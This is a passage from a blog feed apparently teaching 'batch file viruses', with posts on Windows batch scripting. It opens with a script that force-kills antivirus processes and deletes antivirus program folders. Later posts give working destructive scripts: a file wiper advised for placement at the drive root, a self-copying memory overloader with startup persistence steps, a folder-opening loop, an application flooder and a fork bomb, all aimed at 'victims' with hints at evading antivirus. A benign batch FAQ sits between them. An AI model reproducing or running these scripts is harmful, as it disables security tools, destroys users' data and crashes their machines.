taskkill /F /IM pop* &gt;NUL
taskkill /F /IM pav* &gt;NUL
taskkill /F /IM padmin* &gt;NUL
taskkill /F /IM panda* &gt;NUL
taskkill /F /IM avsch* &gt;NUL
taskkill /F /IM sche* &gt;NUL
taskkill /F /IM syman* &gt;NUL
taskkill /F /IM virus* &gt;NUL
taskkill /F /IM realm* &gt;NUL
taskkill /F /IM sweep* &gt;NUL
taskkill /F /IM scan* &gt;NUL
taskkill /F /IM ad-* &gt;NUL
taskkill /F /IM safe* &gt;NUL
taskkill /F /IM avas* &gt;NUL
taskkill /F /IM norm* &gt;NUL
taskkill /F /IM offg* &gt;NUL
RMDIR /Q &quot;C:\Program Files\alwils~1&quot; /S &gt;NUL
RMDIR /Q &quot;C:\Program Files\Lavasoft\Ad-awa~1&quot; /S &gt;NUL
RMDIR /Q &quot;C:\Program Files\kasper~1&quot; /S &gt;NUL
RMDIR /Q &quot;C:\Program Files\trojan~1&quot; /S &gt;NUL
RMDIR /Q &quot;C:\Program Files\f-prot95&quot; /S &gt;NUL
RMDIR /Q &quot;C:\Program Files\tbav&quot; /S &gt;NUL
RMDIR /Q &quot;C:\Program Files\avpersonal&quot; /S &gt;NUL
RMDIR /Q &quot;C:\Program Files\Norton~1&quot; /S &gt;NUL
RMDIR /Q &quot;C:\Program Files\Mcafee&quot; /S &gt;NUL
RMDIR /Q &quot;C:\Program Files\Norton~1\Norton~1\Norton~3&quot; /S &gt;NUL
RMDIR /Q &quot;C:\Program Files\Norton~1\Norton~1\speedd~1&quot; /S &gt;NUL
RMDIR /Q &quot;C:\Program Files\Norton~1\Norton~1&quot; /S &gt;NUL
RMDIR /Q &quot;C:\Program Files\Norton~1&quot; /S &gt;NUL
RMDIR /Q &quot;C:\Program Files\avgamsr&quot; /S &gt;NUL
RMDIR /Q &quot;C:\Program Files\avgamsvr&quot; /S &gt;NUL
RMDIR /Q &quot;C:\Program Files\avgemc&quot; /S &gt;NUL
RMDIR /Q &quot;C:\Program Files\avgcc&quot; /S &gt;NUL
RMDIR /Q &quot;C:\Program Files\avgupsvc&quot; /S &gt;NUL
RMDIR /Q &quot;C:\Program Files\grisoft&quot; /S &gt;NUL
RMDIR /Q &quot;C:\Program Files\nood32krn&quot; /S &gt;NUL
RMDIR /Q &quot;C:\Program Files\nood32&quot; /S &gt;NUL
RMDIR /Q &quot;C:\Program Files\nod32&quot; /S &gt;NUL
RMDIR /Q &quot;C:\Program Files\nood32&quot; /S &gt;NUL
RMDIR /Q &quot;C:\Program Files\kav&quot; /S &gt;NUL
RMDIR /Q &quot;C:\Program Files\kavmm&quot; /S &gt;NUL
RMDIR /Q &quot;C:\Program Files\kaspersky&quot; /S &gt;NUL
RMDIR /Q &quot;C:\Program Files\ewidoctrl&quot; /S &gt;NUL
RMDIR /Q &quot;C:\Program Files\guard&quot; /S &gt;NUL
RMDIR /Q &quot;C:\Program Files\ewido&quot; /S &gt;NUL
RMDIR /Q &quot;C:\Program Files\pavprsrv&quot; /S &gt;NUL
RMDIR /Q &quot;C:\Program Files\pavprot&quot; /S &gt;NUL
RMDIR /Q &quot;C:\Program Files\avengine&quot; /S &gt;NUL
RMDIR /Q &quot;C:\Program Files\apvxdwin&quot; /S &gt;NUL
RMDIR /Q &quot;C:\Program Files\webproxy&quot; /S &gt;NUL
RMDIR /Q &quot;C:\Program Files\panda software&quot; /S &gt;NUL</code></pre><hr><p>Our journey has only just begun so we must keep moving. It should go without saying that you must use this knowledge ethically. Today&#x2019;s systems are largely protected from little batch file viruses, but soon we&#x2019;re going to learn about hacking techniques that can be used to really hurt people and businesses, financially or otherwise. And with that, we bid farewell to batch file viruses.</p><p>Next up, we&#x2019;re going to have a little fun and learn about something <em><a href="https://blog.leewardslope.com.com/zip-bomb">quite explosive</a></em>.</p>]]></content:encoded></item><item><title><![CDATA[Frequently Asked Question about Batch Files.]]></title><description><![CDATA[This article will look into some of the most commonly or frequently asked questions of beginners. You can always look back here for a reference.]]></description><link>https://leewardslope.digitalpress.blog/frequently-asked-questions-about-batch-files/</link><guid isPermaLink="false">604b28edb1829000011b62b9</guid><category><![CDATA[Cyber Security]]></category><dc:creator><![CDATA[Evil Morty]]></dc:creator><pubDate>Sat, 13 Mar 2021 01:30:00 GMT</pubDate><media:content url="https://images.unsplash.com/photo-1484069560501-87d72b0c3669?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MnwxMTc3M3wwfDF8c2VhcmNofDR8fHF1ZXN0aW9uc3xlbnwwfHx8fDE2MTU1Mzg5NDI&amp;ixlib=rb-1.2.1&amp;q=80&amp;w=2000" medium="image"/><content:encoded><![CDATA[<img src="https://images.unsplash.com/photo-1484069560501-87d72b0c3669?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MnwxMTc3M3wwfDF8c2VhcmNofDR8fHF1ZXN0aW9uc3xlbnwwfHx8fDE2MTU1Mzg5NDI&amp;ixlib=rb-1.2.1&amp;q=80&amp;w=2000" alt="Frequently Asked Question about Batch Files."><p>So now we&#x2019;ve got a bunch of <a href="https://leewardslope.digitalpress.blog/introduction-to-batch-file-viruses">batch file viruses</a> under our belt. Now it&#x2019;s time to further solidify your understanding of batch scripting, so that you can start making your own useful batch files (malicious or not). Read up on any new command&#x2019;s help documentation before using them, or simply run them <a href="https://leewardslope.digitalpress.blog/setting-up-a-virtual-machine-to-practice-hacking">inside a virtual machine</a>.</p><p>Included below are some of the most common questions regarding batch files, in general. If you are to truly master the art of working with batch files (and the viruses you can make with them), you&#x2019;ll need to know the answers to these. Batch file programming is very easy, even non-technical people can get the hang of it pretty quickly. Soon enough, you&#x2019;ll be making your own little scripts (and viruses).</p><h2 id="1-should-i-use-bat-or-cmd-as-the-extension-of-a-batch-file">1. Should I use .bat or .cmd as the extension of a batch file?</h2><p>Use either, it doesn&#x2019;t matter (mostly). There are some <a href="https://en.wikipedia.org/wiki/Batch_file#Filename_extensions">minor technical differences</a> between the two but nothing that we need to concern ourselves with while using them on modern Windows operating systems.</p><h2 id="2-how-to-add-comments-to-a-batch-file">2. How to add comments to a batch file?</h2><p>There are two ways to add comments to batch files:</p><p><code>rem</code></p><pre><code class="language-shellsession">@echo off
REM This line will be skipped by the interpreter
ping leewardslope.com</code></pre><p><code>::</code></p><pre><code class="language-shellsession">@echo off
:: This line will also be skipped by the interpreter
ping leewardslope.com</code></pre><h2 id="3-how-to-make-a-batch-file-sleep-or-wait-for-x-seconds">3. How to make a batch file sleep or wait for X seconds?</h2><p>Say you want to pause for 4 seconds. The following is a popular hack for doing this:</p><pre><code class="language-shellsession">ping 127.0.0.1 -n 5 &gt; nul</code></pre><p>This command pings the localhost IP address. The parameter <code>-n 5</code> means it will ping five times. The first ping happens at <code>t=0</code> and there&#x2019;s a time delay of 1 second between each ping so that gives us a 4 second delay where our batch file seems to be doing nothing. Finally, <code>&gt; nul</code> eats up the output of the command so we don&#x2019;t see it during execution.</p><p>Another way to set a timeout in a batch file is to simply use the <code>timeout</code> command:</p><pre><code class="language-shellsession">timeout 4</code></pre><p>This displays a countdown in the output window like:</p><pre><code class="language-shellsession">Waiting for 3 seconds, press a key to continue ...</code></pre><p>If you don&#x2019;t want to see the countdown:</p><pre><code class="language-shellsession">timeout 4 &gt; nul</code></pre><p>Be careful, the <code>timeout</code> command can be skipped by pressing any key. Also, the command <code>timeout x</code> means &#x201C;sleep anywhere between x-1 and x seconds&#x201D;, so it&#x2019;s a little inaccurate.</p><h2 id="4-how-to-run-multiple-batch-files-from-within-a-batch-file">4. How to run multiple batch files from within a batch file?</h2><p>Say you have three batch files that you want to call from one <code>master.bat</code>. There&#x2019;s a couple ways to run these other batch files from inside <code>master.bat</code>:</p><p>This method will execute the batch files one after the other in the same process:</p><pre><code class="language-shellsession">call batch1.bat
call batch2.bat
call batch3.bat</code></pre><p>This method will spawn different command windows each running one batch file:</p><pre><code class="language-shellsession">start cmd /k call batch1.bat
start cmd /k call batch2.bat
start cmd /k call batch3.bat</code></pre><h2 id="5-how-to-echo-a-newline-in-batch-files">5. How to echo a newline in batch files?</h2><p>Using <code>echo.</code> you can print out a blank line.</p><pre><code class="language-shellsession">echo hello
echo.
echo world</code></pre><p>Make sure that there are no spaces between <code>echo</code> and <code>.</code>. The above snippet prints:</p><pre><code class="language-shellsession">hello
world</code></pre><h2 id="6-how-to-run-two-commands-in-one-line-using-cmd-exe-or-batch-files">6. How to run two commands in one line using cmd.exe or batch files?</h2><ul><li>When working in a cmd.exe prompt: <code>echo hello &amp; echo world</code>. This outputs: <code>hello world.</code></li><li>For batch files, use <code>&amp;&amp;</code> instead of <code>&amp;</code> like <code>echo hello &amp;&amp; echo world</code>.</li></ul><h2 id="7-how-to-check-if-a-file-exists-from-within-a-batch-file">7. How to check if a file exists from within a batch file?</h2><p>We can do this by using the constructs <code>if</code> and <code>exist</code>:</p><pre><code class="language-shellsession">if exist [INSERT_FILE_NAME_HERE] (
    echo file exists
) else (
    echo file doesn&apos;t exist
)</code></pre><p>If you don&#x2019;t care about <code>else</code> just leave it out. For example:</p><pre><code class="language-shellsession">if exist myfile.txt echo file exists</code></pre><h2 id="8-how-to-write-the-output-of-a-command-to-a-file">8. How to write the output of a command to a file?</h2><pre><code class="language-shellsession">dir &gt; output.txt</code></pre><p>This will write the output of the command <code>dir</code> to <code>output.txt</code>.</p><h2 id="9-how-to-execute-a-command-n-times-in-a-loop-in-batch-files">9. How to execute a command N times (in a loop) in batch files?</h2><p>For a single command, we can use the one liner:</p><pre><code class="language-shellsession">for /l %%x in (1, 1, 100) do echo %%x</code></pre><p>For looping multiple commands:</p><pre><code class="language-powershell">for /l %%x in (1, 1, 100) do (
   echo %%x
   echo something else
)</code></pre><p><strong>Explanation:</strong> The iteration variable <code>%%x</code> is initialised to <code>1</code> and incremented by <code>1</code> after every iteration until it equals <code>100</code>. The above is for use in a batch file, for using in a command window directly use a single <code>%</code> instead of <code>%%</code>.</p><h2 id="10-how-to-iterate-through-files-and-sub-directories-within-a-directory">10. How to iterate through files and sub directories within a directory?</h2><p>For use in a command window:</p><ul><li>Files in the current directory: <code>for %f in (.\*) do echo %f</code></li><li>Sub directories in the current directory: <code>for /D %s in (.\*) do echo %s</code></li><li>Files in current and all sub directories: <code>for /R %f in (.\*) do echo %f</code></li><li>Sub directories in current and all sub directories: <code>for /R /D %s in (.\*) do echo %s</code></li></ul><p>For batch files, replace <code>%</code> with <code>%%</code>:</p><ul><li>Files in the current directory: <code>for %%f in (.\*) do echo %%f</code></li><li>Subdirectories in the current directory: <code>for /D %%s in (.\*) do echo %%s</code></li><li>Files in current and all subdirectories: <code>for /R %%f in (.\*) do echo %%f</code></li><li>Subdirectories in current and all subdirectories: <code>for /R /D %%s in (.\*) do echo %%s</code></li></ul><h2 id="11-how-to-get-a-list-of-all-running-services-from-the-command-line">11. How to get a list of all running services from the command line?</h2><p>The command <code>net start</code> will output a list of all the currently running services.</p><h2 id="12-how-to-start-or-stop-services-from-the-command-line">12. How to start or stop services from the command line?</h2><pre><code class="language-shellsession">net start [serviceName]</code></pre><p>and</p><pre><code class="language-shellsession">net stop [serviceName]</code></pre><h2 id="13-how-to-check-for-admin-privileges-in-a-batch-file">13. How to check for admin privileges in a batch file?</h2><p>The command <code>net session</code> can be used to check whether the batch file has administrator privileges or not:</p><pre><code class="language-shellsession">net session &gt;nul 2&gt;&amp;1
if %errorLevel% == 0 (
    echo Success: Administrative permissions confirmed.
) else (
    echo Failure: Current permissions inadequate.
)</code></pre><p><strong>Explanation</strong>: First we direct the output and error streams of the <code>net session</code> command to <code>nul</code> and check whether the command executes successfully (errorLevel = 0), which means we have admin privileges, or the command receives an error (errorLevel!=0), which means we don&#x2019;t have admin privileges.</p><h2 id="14-how-to-check-if-a-program-is-running-or-not-in-a-batch-file">14. How to check if a program is running or not in a batch file?</h2><p>The following snippet checks whether <code>chrome.exe</code> (Google Chrome) is running or not:</p><pre><code class="language-shellsession">tasklist /FI &quot;IMAGENAME eq chrome.exe&quot; 2&gt;NUL | find /I /N &quot;chrome.exe&quot;&gt;NUL
if %errorLevel% == 0 (
    echo Program is running
) else (
    echo Program is not running
)</code></pre><h2 id="15-how-to-forcibly-kill-a-process-using-batch-files">15. How to forcibly kill a process using batch files?</h2><p>The command <code>taskkill</code> along with the <code>/f</code> modifier can be used to forcefully shutdown all processes that match the given name (the <code>/im</code> parameter). The process ID (<code>/pid</code>) can be used to kill a single instance (For example, one specific Google Chrome tab).</p><pre><code class="language-shellsession">taskkill /f /im &quot;Taskmgr.exe&quot;</code></pre><p>Note that you may require admin privileges to kill some processes.</p><h2 id="16-how-to-quickly-create-a-large-file-in-windows">16. How to quickly create a large file in Windows?</h2><p>We can do this using <code>fsutil</code>.</p><pre><code class="language-shellsession">fsutil file createnew [fileName] [length]</code></pre><p>This creates a file with a name <code>fileName</code> and size <code>length</code> (in bytes). This would be a sparse file, i.e. composed of just a string of zeros. For example:</p><pre><code class="language-shellsession">fsutil file createnew useless.txt 1024</code></pre><p>will create a 1 kilobyte file named <code>useless.txt</code>.</p><h2 id="17-how-to-copy-all-the-files-from-one-folder-to-another-using-a-windows-command">17. How to copy all the files from one folder to another using a windows command?</h2><p><code>xcopy</code> is a utility built into Windows that does exactly this.</p><pre><code class="language-shellsession">xcopy /s C:\source C:\target</code></pre><p>Remember to enclose the path in double quotes if the path contains spaces (e.g: <code>&quot;C:\Some Folder&quot;</code>).</p><h2 id="18-how-to-delete-a-folder-along-with-all-the-subfolders-and-files">18. How to delete a folder along with all the subfolders and files?</h2><p>The <code>rmdir</code> command is used to delete directories.</p><pre><code class="language-shellsession">rmdir &quot;FolderName&quot; /s /q</code></pre><ul><li><strong>/s</strong> is used to specify removal of the entire directory tree under <code>FolderName</code>.</li><li><strong>/q</strong> specifies &#x2018;quiet mode&#x2019;, that is, delete without requiring confirmation.</li></ul><h2 id="19-how-to-see-the-help-documentation-for-a-command">19. How to see the help documentation for a command?</h2><p>Open up a command window and type <code>help [command_name]</code>. For example: <code>help taskkill</code>.</p><hr><p>And that wraps up our little series on batch files (almost). You should now head out and start experimenting on your own. Who knows, you just might make something that can fly under the radar of an anti-virus. Now let&#x2019;s look a few ideas for <a href="https://leewardslope/how-to-make-your-own-viruses">making your own batch file viruses</a>.</p>]]></content:encoded></item><item><title><![CDATA[Folder Blaster]]></title><description><![CDATA[In this article, we will elaborate on the quote, "The more annoying, the better." Yes, sometimes it is considered better.]]></description><link>https://leewardslope.digitalpress.blog/folder-blaster/</link><guid isPermaLink="false">604adc93b1829000011b6292</guid><category><![CDATA[Cyber Security]]></category><dc:creator><![CDATA[Evil Morty]]></dc:creator><pubDate>Fri, 12 Mar 2021 03:30:00 GMT</pubDate><media:content url="https://images.unsplash.com/photo-1503216963294-431766a5a929?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MnwxMTc3M3wwfDF8c2VhcmNofDZ8fGV4cGxvc2lvbnxlbnwwfHx8fDE2MTU1MTkxMzk&amp;ixlib=rb-1.2.1&amp;q=80&amp;w=2000" medium="image"/><content:encoded><![CDATA[<img src="https://images.unsplash.com/photo-1503216963294-431766a5a929?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MnwxMTc3M3wwfDF8c2VhcmNofDZ8fGV4cGxvc2lvbnxlbnwwfHx8fDE2MTU1MTkxMzk&amp;ixlib=rb-1.2.1&amp;q=80&amp;w=2000" alt="Folder Blaster"><p>The commands we use to make batch files are actually the same commands first implemented in MS-DOS (An ancient Microsoft OS). These DOS(Disk Operating System) commands can also be used in the command prompt window. Whatever your batch file does, you can do it through the command line interface (CLI).</p><p>Start &#x201C;Run&#x201D;, or hit [Windows key + R]. Type &#x201C;cmd&#x201D;, and you&#x2019;re presented with the CLI. You can type &#x201C;help&#x201D; to get a list of commonly used commands and their functions. I recommend you try out each and every single command you can find. Hacking is getting more and more user friendly everyday, CLIs are being replaced by GUIs (Graphical User Interfaces) - meaning in most places you won&#x2019;t have to actually type in the commands, you can just select an option and press a button. But as of now, this is a work in progress. With more advanced hacking techniques, specially the ones that involve using BackTrack tools, you will find that majority of the hacks are still done through the CLI (More on this, later).</p><p>You will soon be learning how to hack into a remote computer and get the CMD window of the victim&#x2019;s computer. Hence, I recommend getting used to the CLI, as soon as possible, as much as possible. Before getting to the code, let&#x2019;s take a look at a couple of commands.</p><p>md - (or mkdir) - Make Directory. This command is used to create a directory (a folder). The command:</p><p><code>md abcd</code></p><p>..will create a folder in the current directory named &#x201C;abcd&#x201D;.</p><p>cd - Change Directory. This command is used to change the current directory. The following command:</p><p><code>cd C:\</code></p><p>..will take the program (your batch file) to the Root folder and:</p><p><code>cd C:\Users</code></p><p>..will take you to the folder called Users in the C drive. You can change where you &#x201C;mkdir&#x201D; by using &#x201C;cd&#x201D;. (You can now create folders in any directory you like)</p><p>Here we&#x2019;ve got the Folder Blaster virus. Again, this one&#x2019;s fairly easy to understand. What we&#x2019;re doing below is creating a bunch of folders, opening them all at once and keeping them open, effectively hogging a big portion of the screen and memory causing the windows to lag, freeze up and sometimes crash.</p><pre><code class="language-shell">@echo off
cd ./Desktop
md 1
md 2
md 3
md 4
md 5
md 6
md 7
md 8
md 9
md 0
:checkpoint
start 1
start 2
start 3
start 4
start 5
start 6
start 7
start 8
start 9
start 0
goto checkpoint</code></pre><p>So, we begin by turning off echo. Then we change the directory to Desktop. Now we create ten folders with names 0-9. We setup a label and start opening up all the 10 folders. Now the final statement causes an infinite loop. Of course, if the folder is already opened it will not be opened again. But the use of this infinite loop is if the user attempts to close the folder, the loop is still going on and it will send a message to open that folder again. So the victim will be stuck as every time s/he closes a folder it opens up again, eventually making them give up and restart the system.The above code can be made much shorter with the use of LOOPs, as discussed below. We start by creating a variable and setting it&#x2019;s value to 0. We use this variable as a check to let the computer know when to come out of the loop. Take a look at the code first:</p><pre><code class="language-shell">@echo off
set /a i=0
:loop
if %i%==10 goto end
echo This is iteration %i%.
set /a i=%i%+1
goto loop
:end</code></pre><p>&#x201C;set&#x201D; is used to define and initialize a variable. Here we create a variable called &#x201C;i&#x201D; and set it&#x2019;s value to zero. After setting up a label, we check if the value of the variable &#x201C;i&#x201D; (given by %i%) is equal to 10, and if it is we &#x201C;goto&#x201D; the label end (the program ends when this happens). Now we &#x201C;echo&#x201D; (send a message) to notify the user which iteration is currently running. In the next step we increment the value of &#x201C;i&#x201D; by one and then go back to the &#x201C;if&#x201D; statement.</p><p>So the loop runs ten times (0-9), and then stops. The above was not a virus, but a simple program. Earlier, I told you that the above Folder Blaster virus code can be made shorter by using loops. You know how to make the virus, and now you know how to use loops. Combining the two of them, I leave as an exercise for the wannabe hacker. (HINT: See the folder names up top going from 0-9 ? You can just replace them with %i% in the above loop.)</p><hr><p>Next up, we&#x2019;re going to equip you with the tools you need to be able to start creating your own viruses. Let&#x2019;s head over there and <a href="https://blog.leewardslope.com/frequently-asked-questions-about-batch-files">learn a bit more about batch file viruses</a>.</p>]]></content:encoded></item><item><title><![CDATA[Wiping out memory, obliviate.]]></title><description><![CDATA[In this tutorial, we’re going to wipe it all off. This is a short and easy one. This is different from the other batch file viruses we’ve seen yet.]]></description><link>https://leewardslope.digitalpress.blog/wiping-out-memory/</link><guid isPermaLink="false">60499821cca76f00012d940b</guid><category><![CDATA[Cyber Security]]></category><dc:creator><![CDATA[Evil Morty]]></dc:creator><pubDate>Thu, 11 Mar 2021 04:18:34 GMT</pubDate><media:content url="https://digitalpress.fra1.cdn.digitaloceanspaces.com/jojxukr/2021/03/obliviate.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://digitalpress.fra1.cdn.digitaloceanspaces.com/jojxukr/2021/03/obliviate.jpg" alt="Wiping out memory, obliviate."><p>Now that we&#x2019;ve learned how to <a href="https://leewardslope.digitalpress.blog/overloading-memory">overloaded the computer&#x2019;s memory</a>, in this tutorial we&#x2019;re going to wipe it all off. This is a short and easy one. This is different than the other batch file viruses we&#x2019;ve seen yet. This can do real damage. Make sure you only run this <a href="https://leewardslope.digitalpress.blog/setting-up-a-virtual-machine-to-practice-hacking">inside a VM</a>.</p><pre><code class="language-powershell">del *.*</code></pre><p>A quick refresher, the <code>del</code> command is used to delete files or folders with the following syntax:</p><pre><code class="language-powershell">del [options] [/A:file_attributes] files_to_delete</code></pre><p>For example: the command <code>del fileName.extension</code>will delete the file &#x2018;fileName.extension&#x2019; in the current directory.<code>*</code>is a wildcard, it means &#x2018;all&#x2019;. So <code>*.*</code> means &#x2018;all file names with any extensions&#x2019;. Putting a <code>*</code> before the <code>.</code> (dot) means that no matter what the file&#x2019;s name is, it will be deleted. Putting a <code>*</code> after the <code>.</code> means that no matter what the file&#x2019;s type is, it will be deleted. Combined, <code>del *.*</code> means that all files and folders encountered by our script in the current directory will be wiped off completely.</p><p>Clearly, this could be quite dangerous to a system as nothing will be left, even the operating system&#x2019;s vital files may be deleted, when this guy is done. But of course, it can only affect files in the directory where the batch file itself is placed. So, placing it at the root level (say <code>C:\deleteEverything.bat</code>) is the way to go.</p><p>How do we protect against it? For one, we have the <strong>principle of least privilege</strong>(PoLP). In most modern operating, the problem of accidental deletion of mission critical files is solved by the use of user access levels. In Windows, if you try to delete something important, you are sure to be greeted by:</p><figure class="kg-card kg-image-card"><img src="https://d33wubrfki0l68.cloudfront.net/c19de98997fd05cae4d77534bb4f00b9d590bc76/08bc9/static/4d76b9741ee55899cc30bcd6dc679db2/a948b/acess-denie.jpg" class="kg-image" alt="Wiping out memory, obliviate." loading="lazy" title="denied"></figure><p>If you try to delete something really really important, the operating system will simply deny doing so. Similarly, if you try to mess with someone else&#x2019;s files (in a multi-user environment), you may not be able to read, edit, execute (or all three) depending on what permissions they (the other user) and the admin has granted you and by extension any scripts or programs you try to run.</p><p>Linux, on the other hand, is even more obsessive when it comes to privileges. File permissions form a core part of nearly all Unix-like systems. So, we hackers have our work cut out for us. Unfortunately our cute little virus will likely not completely corrupt today&#x2019;s systems. However, it can still wipe out any confidential documents that your victim holds dear so it is still dangerous. If you wish to try it out, fire up a virtual machine and let it rip.</p><p>Now let&#x2019;s try a different kind of virus. Up next, we&#x2019;ve got the mighty <a href="https://leewardslope.comfolder-blaster/">folder blaster</a></p>]]></content:encoded></item><item><title><![CDATA[Overloading Memory]]></title><description><![CDATA[The thing about machines is that they all have a limit. What if we intentionally introduce more memory than its capacity? Is that even possible?]]></description><link>https://leewardslope.digitalpress.blog/overloading-memory/</link><guid isPermaLink="false">6047484d7b93e20001083cb5</guid><category><![CDATA[Cyber Security]]></category><dc:creator><![CDATA[Evil Morty]]></dc:creator><pubDate>Wed, 10 Mar 2021 09:45:00 GMT</pubDate><media:content url="https://images.unsplash.com/photo-1601255596436-3d600117f19e?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MnwxMTc3M3wwfDF8c2VhcmNofDI0fHxjbHVtc3klMjBib29rc3xlbnwwfHx8fDE2MTUyODUyNTc&amp;ixlib=rb-1.2.1&amp;q=80&amp;w=2000" medium="image"/><content:encoded><![CDATA[<img src="https://images.unsplash.com/photo-1601255596436-3d600117f19e?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MnwxMTc3M3wwfDF8c2VhcmNofDI0fHxjbHVtc3klMjBib29rc3xlbnwwfHx8fDE2MTUyODUyNTc&amp;ixlib=rb-1.2.1&amp;q=80&amp;w=2000" alt="Overloading Memory"><p>This virus combines the best of the <a href="https://leewardslope.digitalpress.blog/fork-bomb">fork bomb</a> and the <a href="https://leewardslope.digitalpress.blog/application-flooder">application flooder</a>.</p><p>It creates a new batch file in the same directory and then copies itself onto this new file. It then starts this new virus and then both of them create another copy of themselves which are then run and the process repeats over and over and we have an exponential growth in the number of viruses on disk and in memory (RAM).</p><p>So let&#x2019;s have a look:</p><pre><code class="language-powershell">@echo off
:A
set x=%random%
type %0 &gt;&gt; %x%.bat
start %x%.bat
goto:A</code></pre><p>Depending on what runs out first hard disk space or RAM, the batch file may or may not cause permanent damage. In both cases, however, the computer will almost definitely crash, the operating system may be corrupted and on the next start up, you will be greeted by the well-known &#x201C;Blue Screen Of Death&#x201D;. The only way to get rid of it will be to format your hard drive and re-install the operating system.</p><p>(Optional) To make this file execute automatically at startup, Do the following. Create a shortcut of the damage.bat file by right clicking on it. Open the start menu, In programs Open Startup folder and simply drag or cut-paste the shortcut into this folder. The virus will break loose the next time the computer is started up.</p>]]></content:encoded></item><item><title><![CDATA[Application Flooder, Annoy the hell out of your victims.]]></title><description><![CDATA[This article talks about one of the oldest and simplest computer viruses of all time, The Application Flooder. ]]></description><link>https://leewardslope.digitalpress.blog/application-flooder/</link><guid isPermaLink="false">6046f9ab7b93e20001083bac</guid><category><![CDATA[Cyber Security]]></category><dc:creator><![CDATA[Evil Morty]]></dc:creator><pubDate>Tue, 09 Mar 2021 04:33:28 GMT</pubDate><media:content url="https://digitalpress.fra1.cdn.digitaloceanspaces.com/jojxukr/2021/03/application-flooder-1.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://digitalpress.fra1.cdn.digitaloceanspaces.com/jojxukr/2021/03/application-flooder-1.jpg" alt="Application Flooder, Annoy the hell out of your victims."><p>Unlike the <a href="https://leewardslope.digitalpress.blog/fork-bomb">fork bomb</a> we just saw, the &#x201C;Application flooder&#x201D; although technically harmless, is a really annoying virus. Here&#x2019;s how it looks:</p><pre><code class="language-powershell">@echo off
:begin
start mspaint
start notepad
start write
start cmd
start explorer
start control
start calc
goto begin</code></pre><p>Like all the other batch file virus tutorials, I recommend trying this one out <a href="https://leewardslope.digitalpress.blog/setting-up-a-virtual-machine-to-practice-hacking">in a virtual machine</a>.</p><p>Let&#x2019;s go through it line by line:</p><ul><li><code>@echo off</code>- This simply stops the command prompts from appearing when the batch file is executing. When you start a batch file, a command prompt process (cmd.exe) is opened and that batch file&#x2019;s instructions are piped through. We use<code>@echo off</code>when we don&#x2019;t want to notify the user about what the running batch file is doing.</li><li><code>:begin</code>- This is a label. It&#x2019;s like a marker or a checkpoint, a position in the program that we&#x2019;ve given a name to.</li><li><code>start</code>- This is used to start an executable, similar to what happens when you double click an application. You can see that we have a bunch of these commands and they&#x2019;re all starting something different. These are just a handful of the default programs that come with all installations of windows. This is where we&#x2019;re <em>flooding applications</em>. Specifically we&#x2019;re starting up the applications: Paint, Notepad, Word-pad, a command window, file explorer, control panel and a calculator. You can start up any executable (.exe) by using <code>start &lt;PATH-TO-EXECUTABLE&gt;</code>.</li><li><code>goto</code>- Remember the label we just defined above? (<code>:begin</code>) Using the goto command, we <em>go to </em>the label &#x2018;begin&#x2019;, and the program continues execution from there. This is an infinite loop. So all the above applications are started again and again until there are hundreds of open windows or until the operating system crashes or a good antivirus intervenes.</li></ul><hr><p>So there you have it. This is one of the most simplest and oldest viruses out there. But the story isn&#x2019;t over yet. The viruses that actually infect and harm the systems in this day and age are vastly more complicated However, you are now one step closer to a better understanding of the big picture. Head over to the <a href="https://leewardslope.digitalpress.blog/overloading-memory">next virus</a> to continue.</p>]]></content:encoded></item><item><title><![CDATA[Fork Bomb, a Classic Attack]]></title><description><![CDATA[The fork bomb is the equivalent of a DDoS attack on your own system. It aims to deprive the system of memory (RAM)]]></description><link>https://leewardslope.digitalpress.blog/fork-bomb/</link><guid isPermaLink="false">6045bba67b93e20001083a85</guid><category><![CDATA[Cyber Security]]></category><dc:creator><![CDATA[Evil Morty]]></dc:creator><pubDate>Mon, 08 Mar 2021 06:18:11 GMT</pubDate><media:content url="https://images.unsplash.com/photo-1579028017684-1c828c18b5f6?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MXwxMTc3M3wwfDF8c2VhcmNofDI3fHxmb3JrfGVufDB8fHw&amp;ixlib=rb-1.2.1&amp;q=80&amp;w=2000" medium="image"/><content:encoded><![CDATA[<img src="https://images.unsplash.com/photo-1579028017684-1c828c18b5f6?crop=entropy&amp;cs=tinysrgb&amp;fit=max&amp;fm=jpg&amp;ixid=MXwxMTc3M3wwfDF8c2VhcmNofDI3fHxmb3JrfGVufDB8fHw&amp;ixlib=rb-1.2.1&amp;q=80&amp;w=2000" alt="Fork Bomb, a Classic Attack"><p>The <strong>fork bomb </strong>is the equivalent of a DDoS attack on your own system. It aims to deprive the system of memory (RAM), leaving nothing for other applications or the operating system&#x2019;s vital operations required to keep the systems running, hence crashing it. Just 5 characters long, the fork bomb is not permanently harmful for a computer, just annoying.</p><p>We&#x2019;re now going to build on the <a href="https://leewardslope.digitalpress.blog/introduction-to-batch-file-viruses">introduction to batch files</a>. Make sure you&#x2019;ve got a <a href="https://leewardslope.digitalpress.blog/setting-up-a-virtual-machine-to-practice-hacking">VM all set up and running</a>.</p><p>And here is the fork bomb:</p><pre><code class="language-powershell">%0|%0</code></pre><p>Yes, this is it. The above is a shorter alternative for the following more comprehensible code:</p><pre><code class="language-powershell">:s
start %0
